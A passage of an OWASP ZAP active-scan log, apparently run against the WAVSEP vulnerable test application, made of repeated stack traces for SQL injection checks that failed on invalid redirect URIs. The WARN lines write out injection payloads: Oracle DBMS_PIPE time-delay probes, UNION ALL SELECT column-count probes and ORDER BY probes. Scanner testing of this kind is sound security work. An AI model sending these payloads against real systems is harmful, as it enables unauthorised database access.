org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679341 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5726=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(78)||CHR(110)||CHR(114),5) AND 'gUNf'='gUNf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5726=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(78)||CHR(110)||CHR(114),5) AND 'gUNf'='gUNf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679343 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8735=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(115)||CHR(77)||CHR(110),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8735=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(115)||CHR(77)||CHR(110),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679343 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679344 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7454=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(100)||CHR(77)||CHR(102),5)-- NFRu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7454=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(100)||CHR(77)||CHR(102),5)-- NFRu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679344 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679345 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679346 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679347 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 5965-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 5965-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679348 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679348 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679349 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679349 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679350 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check 